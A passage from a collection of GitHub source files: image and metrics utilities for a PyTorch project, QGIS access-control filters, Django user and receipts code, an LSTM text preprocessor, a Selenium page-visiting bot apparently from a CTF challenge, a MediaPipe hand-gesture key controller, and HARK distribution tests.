\"L\"):\n return Image.fromarray(array, mode=mode)\n\n\ndef image2array(array):\n return np.array(array)\n\n\ndef image2tensor(img):\n t = transforms.ToTensor()\n return t(img)\n\n\ndef array2tensor(array):\n return torch.tensor(array)\n\n\ndef arrayHStack(array_li: list):\n return np.concatenate(array_li, axis=1)\n\n\ndef arrayVStack(array_li: list):\n return np.concatenate(array_li, axis=0)\n\n\nclass FetchAllData():\n def __init__(self, mod_symbol: str, root_path: str, posi_symbol: str, nega_symbol: str, resize_to: int = 224):\n\n self.mod_symbol = mod_symbol\n self.root_path = root_path\n self.posi_symbol = posi_symbol\n self.nega_symbol = nega_symbol\n self.trans = transforms.Compose([\n transforms.Resize((resize_to, resize_to)),\n transforms.ToTensor(),\n ])\n\n self.NameAndLabel = self.make_dataset()\n\n def make_dataset(self):\n tmp = [x for x in glob.glob(self.root_path + \"/**/*.*\", recursive=True) if self.mod_symbol in x and \"3x3\" in x]\n posi_li = [[Image.open(x).convert(\"L\"), 1] for x in tmp if self.posi_symbol in x]\n nega_li = [[Image.open(x).convert(\"L\"), 0] for x in tmp if self.nega_symbol in x]\n\n return posi_li + nega_li\n\n def fetch(self):\n return self.NameAndLabel\n\n\ndef abbr(full_list: list):\n abbr = \"\"\n for x in full_list:\n abbr += x[0]\n return abbr\n\n\ndef abbr_double(full_list: list):\n dist = \"SVC-DVC-CC\"\n abbr = \"\"\n for x in full_list[0]:\n abbr += dist[x]\n if len(full_list) == 2 and len(full_list[1]) != 0:\n abbr += \"x\"\n for x in full_list[1]:\n abbr += dist[x]\n return abbr\n\n\ndef read_txt_polar(txt_path: str):\n center_x = center_y = radius = 0\n with open(txt_path, 'r') as f:\n center_x, center_y, radius = f.readlines()\n center_x, center_y, radius = int(center_x.strip(\"\\n\")), int(center_y.strip(\"\\n\")), int(radius.strip(\"\\n\"))\n\n return center_x, center_y, radius\n\n\ndef trans2polar(img: Image, center_x: int, center_y: int, is_drop: bool = False):\n\n img: Image = img.copy()\n\n width, height = img.size\n if is_drop:\n r = int(\n min(-(center_x - height) if (center_x - 0.5 * height) >= 0 else (center_x), -(center_y - width) if\n (center_y - 0.5 * width) >= 0 else (center_y)))\n else:\n x, y = center_x, center_y\n r = int(\n math.sqrt(\n max((x * x + y * y), (x * x + (width - y) * (width - y)), ((height - x) * (height - x) + y * y),\n ((height - x) * (height - x) + (width - y) * (width - y)))))\n\n circumference = int(math.pi * 2 * r)\n\n canvas = Image.new('L', (r, circumference), (100))\n canvas_array = np.array(canvas)\n img_array = np.array(img)\n\n # print(width, height, r, circumference)\n\n for r_ in range(r):\n for l_ in range(circumference // 1):\n\n theta_ = l_ / r if r_ != 0 else 0\n X = int(math.floor(r_ * math.cos(theta_))) + center_x\n Y = int(math.ceil(r_ * math.sin(theta_))) + center_y\n\n if X in range(height) and Y in range(width):\n pixel = img_array[X][Y]\n else:\n pixel = 150\n\n canvas_array[l_][r_] = pixel\n\n canvas = Image.fromarray(canvas_array)\n return canvas\n\n\ndef restore_plot_from_record(vis: RedundancyVisualizer, save_path: str, column: int = 1):\n try:\n for i in range(1, 6):\n csv_path = os.path.join(save_path, \"csv\", str(i), \"Record_acc_auc_kappa.csv\")\n data = pd.read_csv(csv_path, encoding='utf-8', header=None).values\n for x in data:\n vis.plot('Test_AUC_' + str(i), float(x[column]))\n except:\n _ = 1\n\n\ndef restore_all_plot_from_record(env_name_li: list, cfg: ConfigBase):\n for env_name in env_name_li:\n\n vis = RedundancyVisualizer(env=str(env_name).replace(\"save/\", 
\"\").replace(\"./\", \"\").replace(\"/\", \"_\"),\n servers=cfg.vis_servers,\n port=cfg.vis_port)\n save_path = os.path.join(\"./save\" if \"save/\" not in env_name else \"./\", env_name)\n\n restore_plot_from_record(vis=vis, save_path=save_path)\n try:\n AvgPlot(to_=cfg.stop_epoch).vis_plot(result_list=[save_path], title=\"AVERAGE_PLOT\", vis=vis)\n except:\n print(\"ERROR AvgPlot:\" + env_name)\n\n\nclass AvgMax(object):\n def __init__(self, save_path: str):\n self.precision: str = \".4f\"\n self.max_acc_li = []\n self.max_auc_li = []\n self.max_kap_li = []\n self.avg_max_acc = 0\n self.avg_max_auc = 0\n self.avg_max_kap = 0\n self.save_path = save_path\n Path(save_path).mkdir(parents=True, exist_ok=True)\n\n def calculate(self):\n self.avg_max_acc = format(mean(self.max_acc_li), self.precision)\n self.std_max_acc = format(np.std(self.max_acc_li, ddof=1), self.precision)\n\n self.avg_max_auc = format(mean(self.max_auc_li), self.precision)\n self.std_max_auc = format(np.std(self.max_auc_li, ddof=1), self.precision)\n\n self.avg_max_kap = format(mean(self.max_kap_li), self.precision)\n self.std_max_kap = format(np.std(self.max_kap_li, ddof=1), self.precision)\n\n return self.avg_max_acc, self.avg_max_auc, self.avg_max_kap\n\n def save(self):\n self.max_acc_li += [self.avg_max_acc, self.std_max_acc]\n self.max_auc_li += [self.avg_max_auc, self.std_max_auc]\n self.max_kap_li += [self.avg_max_kap, self.std_max_kap]\n save_path = os.path.join(self.save_path, \"avg_std_max.csv\")\n Path(save_path).touch(exist_ok=True)\n with open(save_path, \"w\") as f:\n writer = csv.writer(f)\n head_line = [\"name\"] + [x + 1 for x in range(len(self.max_acc_li) - 2)] + [\"avg\", \"std\"]\n\n writer.writerow(head_line)\n writer.writerow([\"max_acc\"] + self.max_acc_li)\n writer.writerow([\"max_auc\"] + self.max_auc_li)\n writer.writerow([\"max_kap\"] + self.max_kap_li)\n\n def add(self, tp):\n try:\n max_acc = tp.record_best_acc.MAX_ACC\n max_auc = tp.record_best_auc.MAX_AUC\n max_kap = tp.record_best_kap.MAX_KAP\n\n self.add_value(max_acc, max_auc, max_kap)\n\n except:\n _ = 1\n return self\n\n def add_value(self, max_acc, max_auc, max_kap):\n try:\n max_acc = float(format(max_acc, self.precision))\n max_auc = float(format(max_auc, self.precision))\n max_kap = float(format(max_kap, self.precision))\n\n self.max_acc_li.append(max_acc)\n self.max_auc_li.append(max_auc)\n self.max_kap_li.append(max_kap)\n\n except:\n _ = 1\n return self\n\n def conclusion(self):\n avg_acc, avg_auc, _ = self.calculate()\n self.save()\n return avg_acc, avg_auc\n\n\ndef restore_avg_max_from_record(env_name_li: list):\n for env_name in env_name_li:\n save_path = os.path.join(\"./save\" if \"save/\" not in env_name else \"./\", env_name)\n avg_max = AvgMax(save_path=save_path)\n # try:\n for i in range(1, 6):\n try:\n max_acc, max_auc, max_kap = 0., 0., 0.\n csv_path = os.path.join(save_path, \"csv\", str(i), \"Record_acc_auc_kappa.csv\")\n data = pd.read_csv(csv_path, encoding='utf-8', header=None).values\n for x in data[VALID_START_POINT:]:\n acc, auc, kap = float(x[0]), float(x[1]), float(x[2])\n max_acc = acc if acc > max_acc else max_acc\n max_auc = auc if auc > max_auc else max_auc\n max_kap = kap if kap > max_kap else max_kap\n\n avg_max.add_value(max_acc, max_auc, max_kap)\n except:\n _ = 1\n\n # avg_max.add_value(max_acc, max_auc, max_kap)\n\n avg_max.conclusion()\n\n # except:\n # _ = 1\n\n\ndef gen_csv_report_from_record(env_name_li: list):\n save_path = os.path.join(\"./report\", time.strftime(\"%Y-%m-%d_%H.%M.%S\", 
time.localtime()) + \"_report.csv\")\n Path(save_path).parent.mkdir(parents=True, exist_ok=True)\n Path(save_path).touch(exist_ok=True)\n with open(save_path, \"w\") as f:\n writer = csv.writer(f)\n head_line = [\"Index\", \"Environment\", \"ACC\", \"ACC_STD\", \"AUC\", \"AUC_STD\", \"Kappa\", \"Kappa_STD\", \"Remark\"]\n writer.writerow(head_line)\n\n for i, env_name in enumerate(env_name_li):\n avg_max_path = os.path.join(\"./save\" if \"save/\" not in env_name else \"./\", env_name)\n csv_path = os.path.join(avg_max_path, \"avg_std_max.csv\")\n\n data = pd.read_csv(csv_path, encoding='utf-8').values\n acc, acc_std, auc, auc_std, kpa, kpa_std = data[0][-2], data[0][-1], data[1][-2], data[1][-1], data[2][-2], data[2][\n -1]\n\n writer.writerow([int(i + 1), env_name] + [acc, acc_std, auc, auc_std, kpa, kpa_std])\n\n\ndef mode_trans(cam_weight, mode: int = 8):\n '''\n mode = 1 : IE\n mode = 4 : ETDRS\n mode = -4: hemispheric\n mode = 8 : SubETDRS\n '''\n if mode == 1:\n for i in [0, 1, 2]:\n cam_weight[:, i] = np.mean(cam_weight, axis=0)[i]\n return cam_weight\n\n if mode == 4:\n for line in [0, 2, 4, 6]:\n for i in [0, 1, 2]:\n l_1, l_2 = (line + 2) % 8, (line + 1) % 8\n cam_weight[l_2][i] = (cam_weight[l_2][i] + cam_weight[l_1][i]) / 2\n cam_weight[l_1][i] = cam_weight[l_2][i]\n return cam_weight\n\n if mode == -4:\n for line in [0, 2, 4, 6]:\n for i in [0, 1, 2]:\n l_1, l_2 = (line + 1) % 8, (line + 0) % 8\n cam_weight[l_2][i] = (cam_weight[l_2][i] + cam_weight[l_1][i]) / 2\n cam_weight[l_1][i] = cam_weight[l_2][i]\n return cam_weight\n\n if mode == 8:\n return cam_weight\n\n return cam_weight\n\n\ndef norm_npy(x, U=None):\n U = x[:, 1:] if U is None else U[:, 1:]\n\n x -= U.min()\n U -= U.min()\n\n x /= U.max()\n return x\n\n\ndef npy_cam_fusion(env, epoch_li, mode: int = 8, is_relative: bool = True, is_draw_bound: bool = False):\n npy_path_li = [[\n \"{}/weight_cam/{}/epoch_{}_8_{}.npy\".format(env, fold + 1, epoch, index) for fold, epoch in enumerate(epoch_li)\n ] for index in [0, 1, 2]]\n npy_li = [np.array([np.load(x) for x in npy_path_li[index]]).sum(axis=0) for index in [0, 1, 2]]\n\n npy_li = [norm_npy(x) for x in npy_li] if is_relative else [norm_npy(x, np.array(npy_li)) for x in npy_li]\n\n [\n draw_weight_cam(x, is_draw_bound=is_draw_bound, mode=mode).save(\"{}/m{}_r{}_i{}.png\".format(env, mode, is_relative, i))\n for i, x in enumerate(npy_li)\n ]\n\n return npy_li\n\n\ndef draw_weight_cam(cam_weight, is_draw_bound: bool = False, mode: int = 8):\n line_color: str = \"green\"\n\n image = Image.new('RGB', (224, 224))\n draw_obj = ImageDraw.Draw(image)\n # colormap = matplotlib.colormaps['jet']\n colormap = matplotlib.cm.get_cmap(\"jet\")\n\n cam_weight = mode_trans(cam_weight=cam_weight, mode=mode)\n\n cam_weight = colormap(cam_weight)\n cam_weight = np.uint8(cam_weight * 255)\n\n for i, line in enumerate([7, 6, 5, 4, 3, 2, 1, 0]):\n color1 = (0, 0, 0)\n color2 = tuple(cam_weight[line][1])\n color3 = tuple(cam_weight[line][2])\n\n draw_obj.pieslice((0, 0, 224, 224), start=-45 * (i + 1), end=-45 * i, fill=color3)\n draw_obj.pieslice((112 - 2 * 37, 112 - 2 * 37, 112 + 2 * 37, 112 + 2 * 37),\n start=-45 * (i + 1),\n end=-45 * i,\n fill=color2)\n draw_obj.pieslice((112 - 0.78 * 37, 112 - 0.78 * 37, 112 + 0.78 * 37, 112 + 0.78 * 37), start=0, end=365, fill=color1)\n\n if is_draw_bound:\n draw_obj.ellipse((0, 0, 224, 224), outline=line_color, width=2)\n draw_obj.ellipse((112 - 2 * 37, 112 - 2 * 37, 112 + 2 * 37, 112 + 2 * 37), outline=line_color)\n draw_obj.ellipse((112 - 1 * 37, 112 
- 1 * 37, 112 + 1 * 37, 112 + 1 * 37), outline=line_color)\n\n draw_obj.line((33, 33, 224 - 33, 224 - 33), line_color)\n draw_obj.line((224 - 33, 33, 33, 224 - 33), line_color)\n\n if mode == 8:\n draw_obj.line((0, 112, 224, 112), line_color)\n draw_obj.line((112, 0, 112, 224), line_color)\n\n return image\n","repo_name":"iAaronLau/Polar-Net-Pytorch","sub_path":"tools/utils_pack.py","file_name":"utils_pack.py","file_ext":"py","file_size_in_byte":20818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2499908744","text":"# coding=utf-8\n\"\"\"\"Single layer constraints\n\n.. note:: This program is free software; you can redistribute it and/or modify\n it under the terms of the Mozilla Public License 2.0.\n\n\"\"\"\n\n__author__ = 'elpaso@itopen.it'\n__date__ = '2020-04-15'\n__copyright__ = 'Copyright 2020, Gis3W'\n\n\nfrom qgis.server import QgsAccessControlFilter\nfrom qgis.core import QgsMessageLog, Qgis\nfrom qdjango.apps import QGS_SERVER\nfrom qdjango.models import ConstraintSubsetStringRule, ConstraintExpressionRule, Layer\n\nclass SingleLayerSubsetStringAccessControlFilter(QgsAccessControlFilter):\n \"\"\"A filter that sets a subset string from the layer constraints\"\"\"\n\n def __init__(self, server_iface):\n super().__init__(server_iface)\n\n def layerFilterSubsetString(self, layer):\n \"\"\"Retrieve and sets user layer constraints\"\"\"\n\n try:\n qdjango_layer = Layer.objects.get(project=QGS_SERVER.project, qgs_layer_id=layer.id())\n except Layer.DoesNotExist:\n return \"\"\n\n rule = ConstraintSubsetStringRule.get_rule_definition_for_user(QGS_SERVER.user, qdjango_layer.pk)\n QgsMessageLog.logMessage(\"SingleLayerSubsetStringAccessControlFilter rule for user %s and layer id %s: %s\" % (QGS_SERVER.user, layer.id(), rule), \"\", Qgis.Info)\n return rule\n\n\n\n# Register the filter, keep a reference because of the garbage collector\nac_filter = SingleLayerSubsetStringAccessControlFilter(QGS_SERVER.serverInterface())\n# Note: this should be the last filter, set the priority to 10000\nQGS_SERVER.serverInterface().registerAccessControl(ac_filter, 10000)\n\n\nclass SingleLayerExpressionAccessControlFilter(QgsAccessControlFilter):\n \"\"\"A filter that sets an expression filter from the layer constraints\"\"\"\n\n def __init__(self, server_iface):\n super().__init__(server_iface)\n\n def layerFilterExpression(self, layer):\n \"\"\"Retrieve and sets user layer constraints\"\"\"\n\n try:\n qdjango_layer = Layer.objects.get(project=QGS_SERVER.project, qgs_layer_id=layer.id())\n except Layer.DoesNotExist:\n return \"\"\n\n rule = ConstraintExpressionRule.get_rule_definition_for_user(QGS_SERVER.user, qdjango_layer.pk)\n QgsMessageLog.logMessage(\"SingleLayerExpressionAccessControlFilter rule for user %s and layer id %s: %s\" % (QGS_SERVER.user, layer.id(), rule), \"\", Qgis.Info)\n return rule\n\n\n# Register the filter, keep a reference because of the garbage collector\nac_filter2 = SingleLayerExpressionAccessControlFilter(QGS_SERVER.serverInterface())\nQGS_SERVER.serverInterface().registerAccessControl(ac_filter2, 9999)\n","repo_name":"pblottiere/g3w-admin","sub_path":"g3w-admin/qdjango/server_filters/accesscontrol/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"28702335419","text":"import functools\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.core.exceptions import 
ValidationError\nfrom django.db import models\n\nfrom users.mixins import PhoneNumberMixin\nfrom users.utils import get_random_str\n\nauthorization_code_generator = functools.partial(get_random_str, 2)\ninvite_code_generator = functools.partial(get_random_str, 3)\n\n\nclass User(PhoneNumberMixin, AbstractUser):\n invite_code = models.CharField(\n max_length=6,\n default=invite_code_generator,\n unique=True,\n verbose_name='Invite code',\n help_text='Invite code',\n )\n invited_by = models.ForeignKey(\n 'self',\n on_delete=models.SET_NULL,\n related_name='invitees',\n null=True,\n blank=True,\n verbose_name='Invited by',\n help_text='Invited by',\n )\n\n class Meta:\n verbose_name = 'User'\n verbose_name_plural = 'Users'\n ordering = ('-pk',)\n\n def __str__(self):\n return f'User <{self.username}> ({self.phone_number})'\n\n def save(self, *args, **kwargs):\n if self.invited_by and self.invited_by.phone_number == self.phone_number:\n raise ValidationError('Self invitation prohibited.')\n super().save(*args, **kwargs)\n\n\nclass AuthorizationAttempt(PhoneNumberMixin):\n authorization_code = models.CharField(\n max_length=4,\n default=authorization_code_generator,\n unique=True,\n verbose_name='Authorization code',\n help_text='Authorization code',\n )\n\n class Meta:\n verbose_name = 'Authorization attempt'\n verbose_name_plural = 'Authorization attempts'\n ordering = ('-pk',)\n\n def __str__(self):\n return f'Authorization attempt ({self.phone_number})'\n","repo_name":"AlexanderUp/simple_referal_system","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43558782994","text":"import numpy\nfrom tensorflow.keras.utils import to_categorical\n\n\n# Parses the text, map unique chars to integers and provides a dictionary to convert char2int and int2char\ndef Parse(txt):\n chars = sorted(list(set(txt)))\n char2int = dict((c, i) for i, c in enumerate(chars))\n int2char = dict((i, c) for i, c in enumerate(chars))\n \n nChars = len(txt)\n nAlpha = len(chars)\n convDict = {\"char2int\": char2int, \"int2char\": int2char}\n return convDict, nChars, nAlpha\n\n\n# Preprocess for LSTM (seqSize = sentence size)\ndef Preprocess(txt, seqSize, nChars, nAlpha, char2int):\n dataX = []\n dataY = []\n for i in range(0, nChars - seqSize, 1):\n seqIn = txt[i:i + seqSize]\n seqOut = txt[i + seqSize]\n dataX.append([char2int[char] for char in seqIn])\n dataY.append(char2int[seqOut])\n nPats = len(dataX)\n print (\"Total Patterns: \", nPats)\n \n X = numpy.reshape(dataX, (nPats, seqSize, 1))\n # normalize by alphabet size\n X = X / float(nAlpha)\n # Convert dataY to binary class matrix\n y = to_categorical(dataY)\n return X, y , dataX\n","repo_name":"miltonluaces/problem_solving","sub_path":"NLP/IV_Analysis/TextForecasting/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"22236742784","text":"from selenium import webdriver\nimport time, logging\n\ndef view_meme(url: str):\n chrome_args = [\n '--headless',\n\t\t'--no-sandbox',\n 
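# (added note) the flags below additionally strip networking, extensions,\n\t\t# GPU use and the JS JIT so the headless review browser stays minimal; any\n\t\t# extra flag, e.g. a hypothetical '--proxy-server=...', would be appended here\n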
'--disable-dev-shm-usage',\n\t\t'--disable-background-networking',\n\t\t'--disable-default-apps',\n\t\t'--disable-extensions',\n\t\t'--disable-gpu',\n\t\t'--disable-sync',\n\t\t'--disable-translate',\n\t\t'--hide-scrollbars',\n\t\t'--metrics-recording-only',\n\t\t'--mute-audio',\n\t\t'--no-first-run',\n\t\t'--safebrowsing-disable-auto-update',\n\t\t'--js-flags=--noexpose_wasm,--jitless'\n\t]\n\n chrome_options = webdriver.ChromeOptions()\n \n for arg in chrome_args:\n chrome_options.add_argument(arg)\n\n driver = None\n\n try:\n driver = webdriver.Chrome(chrome_options=chrome_options)\n driver.get(url)\n time.sleep(10)\n except Exception as e:\n logging.error(e)\n finally:\n if not driver is None:\n driver.quit()","repo_name":"uwa-iss/public-uwactf-challenges-2022","sub_path":"web/memedb/challenge/app/reviewer.py","file_name":"reviewer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"19"} +{"seq_id":"34198896127","text":"import cv2\r\nimport mediapipe as mp\r\nmp_drawing = mp.solutions.drawing_utils\r\nimport colors as mp_drawing_styles\r\nmp_hands = mp.solutions.hands\r\nfrom KeyPresses import sendKey, holdDown, letUp\r\nfrom WindowSetup import get_application\r\n\r\n#app = get_application(\"notepad.exe\")\r\napp = get_application()\r\n\r\n# starting positions are unpressed\r\nrightPressed = False\r\nleftPressed = False\r\nupPressed = False\r\ndownPressed = False\r\n\r\n# key values to send to game\r\nrightKey = \"d\"\r\nleftKey = \"a\"\r\ndownKey = \"s\"\r\nupKey = \"w\"\r\n\r\n# For webcam input:\r\ncap = cv2.VideoCapture(0)\r\nwith mp_hands.Hands(\r\n model_complexity=0,\r\n min_detection_confidence=0.5,\r\n min_tracking_confidence=0.5) as hands:\r\n\r\n if cap.isOpened():\r\n height, width, channels = cap.read()[1].shape\r\n while cap.isOpened():\r\n success, image = cap.read()\r\n if not success:\r\n print(\"Ignoring empty camera frame.\")\r\n # If loading a video, use 'break' instead of 'continue'.\r\n continue\r\n\r\n # To improve performance, optionally mark the image as not writeable to\r\n # pass by reference.\r\n image.flags.writeable = False\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = hands.process(image)\r\n\r\n # Draw the hand annotations on the image.\r\n image.flags.writeable = True\r\n\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n if results.multi_hand_landmarks:\r\n\r\n control_hand = results.multi_hand_landmarks[-1]\r\n\r\n # do controls here\r\n\r\n # up/down\r\n if control_hand.landmark[12].y < .1: # up\r\n if not upPressed:\r\n holdDown(app, upKey)\r\n upPressed = True\r\n else:\r\n if upPressed:\r\n letUp(app, upKey)\r\n upPressed = False\r\n\r\n if control_hand.landmark[9].y > .8: # down\r\n if not downPressed:\r\n holdDown(app, downKey)\r\n downPressed = True\r\n else:\r\n if downPressed:\r\n letUp(app, downKey)\r\n downPressed = False\r\n\r\n # right/left\r\n if control_hand.landmark[9].x < .2: # right\r\n if not rightPressed:\r\n holdDown(app, rightKey)\r\n rightPressed = True\r\n else:\r\n if rightPressed:\r\n letUp(app, rightKey)\r\n rightPressed = False\r\n\r\n if control_hand.landmark[9].x > .8: # left\r\n if not leftPressed:\r\n holdDown(app, leftKey)\r\n leftPressed = True\r\n else:\r\n if leftPressed:\r\n letUp(app, leftKey)\r\n leftPressed = False\r\n\r\n\r\n mp_drawing.draw_landmarks(\r\n image,\r\n control_hand,\r\n mp_hands.HAND_CONNECTIONS,\r\n mp_drawing_styles.get_default_hand_landmarks_style(),\r\n 
mp_drawing_styles.get_default_hand_connections_style())\r\n\r\n if results.multi_hand_landmarks and len(results.multi_hand_landmarks) > 1:\r\n for hand_landmarks in results.multi_hand_landmarks[:-1]:\r\n mp_drawing.draw_landmarks(\r\n image,\r\n hand_landmarks,\r\n mp_hands.HAND_CONNECTIONS,\r\n mp_drawing_styles.get_faded_hand_landmarks_style(),\r\n mp_drawing_styles.get_faded_hand_connections_style())\r\n\r\n # Flip the image horizontally for a selfie-view display.\r\n cv2.imshow('MediaPipe Hands', cv2.flip(image, 1))\r\n if cv2.waitKey(5) & 0xFF == 27:\r\n break\r\ncap.release()\r\n","repo_name":"rwbxd/handController","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71561661220","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, HttpResponseServerError\nfrom .models import Receipts, Item\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom _datetime import datetime\nfrom django.core.serializers import serialize\nfrom .processors import sync as sync_processor\nfrom oauth.credentials import google_credentials\n\nimport base64\n\n\nimport json\n\ndef index(request):\n return render(request, 'receipts/receipts.html')\n\ndef pickup(request):\n return render(request, 'receipts/pickup.html')\n\n@csrf_exempt\ndef pickup_endpoint(request):\n def parse_json():\n received_json_data=json.loads(request.body.decode('utf-8'))\n raw = received_json_data['raw_content']\n name = received_json_data['name']\n user = received_json_data['user']\n return user, name, raw\n\n def parse_form():\n raw = request.POST['raw_content']\n name = request.POST['name']\n user = request.POST['user']\n return user, name, raw\n\n try:\n user, name, raw = parse_json()\n except Exception as e1:\n try:\n user, name, raw = parse_form()\n except Exception as e2:\n print(e1)\n print(e2)\n\n rc = base64.urlsafe_b64decode(raw).decode('unicode_escape')\n rdate = datetime.strptime(rc.split(\"\\r\\n\")[2].strip(), '%a, %d %b %Y %H:%M:%S %z (%Z)')\n r = Receipts(receipts_name=name, receipts_date=rdate, raw_content=rc, user=user)\n r.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('receipts:pickup'))\n\n\ndef search_receipts(request):\n \"\"\"\n Searches all receipts. 
This is a POST method; it accepts JSON data only.\n    \"\"\"\n    received_json_data = json.loads(request.body.decode('utf-8'))\n    print(received_json_data)\n\n    filter_p = {'invalid': False}\n    if 'name' in received_json_data:\n        filter_p['receipts_name__startswith'] = received_json_data['name']\n    if 'from' in received_json_data:\n        filter_p['receipts_date__gt'] = received_json_data['from']\n    if 'to' in received_json_data:\n        filter_p['receipts_date__lt'] = received_json_data['to']\n\n    order_by = received_json_data['order_by'] if 'order_by' in received_json_data else '-receipts_date'\n    page_start = received_json_data['page_start'] if 'page_start' in received_json_data else 0\n    page_size = received_json_data['page_size'] if 'page_size' in received_json_data else 1000000\n\n    # bug fix: honour the requested ordering (was hard-coded to '-receipts_date')\n    receipts_list = Receipts.objects.filter(**filter_p).order_by(order_by)[page_start:page_start + page_size]\n    data_s = json.loads(serialize('json', receipts_list, fields=('receipts_name', 'receipts_date', 'total_price')))\n\n    def to_json_line(r):\n        j = r['fields']\n        j['id'] = r['pk']\n        return j\n\n    data = list(map(to_json_line, data_s))\n    return JsonResponse({'payload': data})\n\n\ndef get_detail(request, receipts_id):\n    items = Item.objects.filter(receipts_id=receipts_id)\n    data_s = json.loads(serialize('json', items))\n\n    def to_json_line(i):\n        j = i['fields']\n        j['id'] = i['pk']\n        return j\n\n    data = list(map(to_json_line, data_s))\n    return JsonResponse({'payload': data})\n\n\ndef get_raw(request, receipts_id):\n    receipts = Receipts.objects.get(pk=receipts_id)\n    return JsonResponse({'payload': receipts.raw_content})\n\n\ndef sync(request):\n    if 'google_user' not in request.session or request.session['google_user'] not in google_credentials:\n        return HttpResponseServerError('Please login first')\n\n    user = request.session['google_user']\n    sync_processor.sync(user)\n    return HttpResponse('Success')\n\n\n","repo_name":"dsalimao/ali-frontend","sub_path":"receipts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"43788972120","text":"import unittest\n\nimport numpy as np\nimport xarray as xr\n\nfrom HARK.distribution import (\n    Bernoulli,\n    DiscreteDistribution,\n    DiscreteDistributionLabeled,\n    IndexDistribution,\n    Lognormal,\n    MarkovProcess,\n    MeanOneLogNormal,\n    MVNormal,\n    Normal,\n    Uniform,\n    Weibull,\n    calc_expectation,\n    calc_lognormal_style_pars_from_normal_pars,\n    calc_normal_style_pars_from_lognormal_pars,\n    combine_indep_dstns,\n    distr_of_function,\n    expected,\n)\nfrom HARK.tests import HARK_PRECISION\n\n\nclass DiscreteDistributionTests(unittest.TestCase):\n    \"\"\"\n    Tests for distribution.py sampling distributions\n    with default seed.\n    \"\"\"\n\n    def test_draw(self):\n        self.assertEqual(\n            DiscreteDistribution(np.ones(1), np.zeros(1)).draw(1)[0],\n            0,\n        )\n\n    def test_distr_of_function(self):\n        # Function 1 -> 1\n        # Approximate the lognormal expectation\n        sig = 0.05\n        norm = Normal(mu=-(sig**2) / 2, sigma=sig).discretize(131, method=\"hermite\")\n        my_logn = distr_of_function(norm, func=lambda x: np.exp(x))\n        exp = calc_expectation(my_logn)\n        self.assertAlmostEqual(exp, 1.0)\n\n        # Function 1 -> n\n        # Mean and variance of the normal\n        norm = Normal(mu=0.0, sigma=1.0).discretize(5, method=\"hermite\")\n        moments = distr_of_function(norm, lambda x: np.array([x, x**2]))\n        exp = calc_expectation(moments).flatten()\n        self.assertAlmostEqual(exp[0], 0.0)\n        self.assertAlmostEqual(exp[1], 1.0)\n\n        # Function 
n -> 1\n # Expectation of the sum of two independent normals\n mu_a, mu_b = 1.0, 2.0\n si_a, si_b = 3.0, 4.0\n norm_a = Normal(mu=mu_a, sigma=si_a).discretize(5, method=\"hermite\")\n norm_b = Normal(mu=mu_b, sigma=si_b).discretize(5, method=\"hermite\")\n binorm = combine_indep_dstns(norm_a, norm_b)\n mysum = distr_of_function(binorm, lambda x: np.sum(x))\n exp = calc_expectation(mysum)\n self.assertAlmostEqual(exp[0], mu_a + mu_b)\n\n # Function n -> m\n # Mean and variance of two normals\n moments = distr_of_function(\n binorm,\n lambda x: np.array([x[0], (x[0] - mu_a) ** 2, x[1], (x[1] - mu_b) ** 2]),\n )\n exp = calc_expectation(moments)\n self.assertAlmostEqual(exp[0], mu_a)\n self.assertAlmostEqual(exp[1], si_a**2)\n self.assertAlmostEqual(exp[2], mu_b)\n self.assertAlmostEqual(exp[3], si_b**2)\n\n def test_calc_expectation(self):\n dd_0_1_20 = Normal().discretize(20, method=\"hermite\")\n dd_1_1_40 = Normal(mu=1).discretize(40, method=\"hermite\")\n dd_10_10_100 = Normal(mu=10, sigma=10).discretize(100, method=\"hermite\")\n\n ce1 = calc_expectation(dd_0_1_20)\n ce2 = calc_expectation(dd_1_1_40)\n ce3 = calc_expectation(dd_10_10_100)\n\n self.assertAlmostEqual(ce1[0], 0.0)\n self.assertAlmostEqual(ce2[0], 1.0)\n self.assertAlmostEqual(ce3[0], 10.0)\n\n ce4 = calc_expectation(dd_0_1_20, lambda x: 2**x)\n\n self.assertAlmostEqual(ce4[0], 1.27154, places=HARK_PRECISION)\n\n ce5 = calc_expectation(dd_1_1_40, lambda x: 2 * x)\n\n self.assertAlmostEqual(ce5[0], 2.0)\n\n ce6 = calc_expectation(dd_10_10_100, lambda x, y: 2 * x + y, 20)\n\n self.assertAlmostEqual(ce6[0], 40.0)\n\n ce7 = calc_expectation(\n dd_0_1_20, lambda x, y: x + y, np.hstack(np.array([0, 1, 2, 3, 4, 5]))\n )\n\n self.assertAlmostEqual(ce7.flat[3], 3.0)\n\n PermShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n TranShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n IncShkDstn = combine_indep_dstns(PermShkDstn, TranShkDstn)\n\n ce8 = calc_expectation(IncShkDstn, lambda atoms: atoms[0] + atoms[1])\n\n self.assertAlmostEqual(ce8, 2.0)\n\n ce9 = calc_expectation(\n 